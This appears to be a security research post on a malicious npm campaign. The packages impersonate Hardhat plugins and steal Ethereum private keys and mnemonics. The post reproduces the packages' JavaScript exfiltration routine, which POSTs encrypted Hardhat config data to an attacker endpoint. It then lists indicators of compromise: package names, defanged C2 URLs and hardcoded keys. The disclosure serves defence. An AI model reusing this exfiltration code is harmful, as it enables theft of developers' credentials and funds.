Research
Socket Research Team
January 2, 2025
Hardhat, maintained by the Nomic Foundation, is a vital tool for Ethereum developers. As a versatile development environment for Ethereum, it streamlines the creation, testing, and deployment of smart contracts and dApps. Its flexible plugin architecture allows developers to customize workflows with tools and extensions, optimizing productivity and supporting the entire Ethereum development lifecycle.
A supply chain attack is currently targeting the Nomic Foundation and Hardhat ecosystem, two integral parts of Ethereum development. By exploiting trust in open source plugins, attackers have planted malicious npm packages that exfiltrate critical data such as private keys, mnemonics, and configuration details.
This ongoing attack targets the Nomic Foundation, Hardhat, and associated plugins via malicious npm packages that impersonate legitimate plugins. So far 20 malicious packages published by three primary authors have been identified; the most downloaded, @nomicsfoundation/sdk-test, accumulated 1,092 downloads. The impact includes compromised development environments, potential backdoors in production systems, and loss of funds.
Analyzing the Ethereum addresses associated with the recent discovery of malicious npm package campaigns reveals several key findings:
Attackers have employed Ethereum smart contracts to dynamically retrieve C2 server addresses. This method leverages the decentralized and immutable nature of the blockchain, making it challenging to disrupt the C2 infrastructure. For instance, the smart contract at address 0xa1b40044EBc2794f207D45143Bd82a1B86156c6b has been used to store and serve C2 addresses to infected systems.
Specific Ethereum wallet addresses have been identified in connection with these campaigns. Notably, the wallet 0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84 is associated with the smart contract above and is passed as a parameter when retrieving C2 server information.
Attackers have employed impersonation as their primary strategy, mimicking the names of legitimate packages and organizations to embed themselves within the supply chain. Examples include @nomisfoundation/hardhat-configure and @monicfoundation/hardhat-config, both designed to look like genuine Hardhat plugins while carrying malicious code.
Legitimate package: @nomiclabs/hardhat-ethers; Malicious package: @nomisfoundation/hardhat-configure
Legitimate package: hardhat-deploy; Malicious package: hardhat-deploy-others

The malicious packages call hreInit() or hreConfig() to exfiltrate sensitive data, while legitimate plugins use the Hardhat Runtime Environment (HRE) for valid tasks like contract deployment or testing. The exfiltration routine found in the malicious packages is reproduced below; the attack flow then follows a structured path:

```javascript
// Excerpt from the malicious packages. axios, aesEncrypt, AES_KEY and API_URL
// are defined elsewhere in the package; `hre` holds the Hardhat config/runtime data.
var info;
// Only serialize the environment when a mnemonic or private key is present.
if (hre?.MNEMONIC?.length > 0 || hre?.PRIVATE_KEY?.length > 0) {
    info = JSON.stringify(hre);
}
// Encrypt with the hardcoded key so the payload is opaque on the wire.
var encodedInfo = aesEncrypt(info, AES_KEY);
// POST to the attacker's collection endpoint (the setData URL in the IOCs below).
// The request is sent even when no secret was found and `info` is still undefined.
axios.post(API_URL + "/projects/setData", {
    project: "hardhat",
    info: encodedInfo,
    state: 'okay'
});
```
The attack begins when a compromised package is installed. The package uses functions named hreInit() and hreConfig() to pull sensitive details such as private keys, mnemonics, and configuration files out of the Hardhat Runtime Environment. The collected data is transmitted to attacker-controlled endpoints, using hardcoded keys and Ethereum addresses for streamlined exfiltration.
This attack compromises sensitive data, including private keys and mnemonics, undermining trust in open source ecosystems. Additionally, it risks deploying malicious contracts to the Ethereum mainnet, further escalating the potential damage.
This attack highlights just one malicious campaign within the open source ecosystem and the critical need for vigilance in package selection. Developers and organizations must implement stricter auditing and monitoring practices to safeguard their development environments. Install the free Socket for GitHub app to avoid accidentally installing one of these malicious packages. Socket's AI-powered threat detection catches these types of attacks, and 70+ other indicators of supply chain risk, before they land in your development environment.
Indicators of compromise

npm authors and the packages they published:
lightfury0000000: nomicsfoundations, @nomisfoundation/hardhat-configure, @nomisfoundation/hardhat-config, @monicfoundation/hardhat-config
nomicsfoundation: @nomicsfoundation/sdk-test, @nomicsfoundation/hardhat-config, @nomicsfoundation/web3-sdk, @nomicsfoundation/sdk-test1
brightstar1001

C2 and exfiltration endpoints:
hxxps://projects[.]metabest[.]tech/api
hxxps://cryptoshiny[.]com/api
hxxps://cryptoshiny[.]com/api/projects/setData
hxxps://cryptoshiny[.]com/api/projects/getAddress
hxxps://projects[.]cryptosnowprince[.]com/api
hxxp://t0uxistfm4fo6bg9pjfpdqb1ssyjmfa4[.]oastify[.]com
hxxps://pastebin[.]com/api/api_post[.]php

Hardcoded keys and tokens:
8GAq/DfzWy74ESgzmSYPXMSghwPjOY3oa7HZ6u+FSCs=:PMnracLLHhsVjTj+dwHOQQ==
zCviLVtg0oHC2aT_xQ_7VU96pzxM35ju
d8186f40984375851b912c75b5bd24e7

Ethereum addresses:
0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2
0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c
0xae13d989daC2f0dEbFf460aC112a837C89BAa7cd
0xE0B7927c4aF23765Cb51314A0E0521A9645F0E2A
0x0d500B1d8E8eF31E21C99d1Db9A6444d3ADf1270

Note that 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c and 0x0d500B1d8E8eF31E21C99d1Db9A6444d3ADf1270 are the canonical WETH, WBNB and WMATIC token contracts. They are public contracts, not attacker-controlled wallets, so treat them as context for analysis rather than as blocklist entries; the package names and endpoints above are the actionable indicators.
Dhanesh Dodia
Sambarathi Sai
Dwijay Chintakunta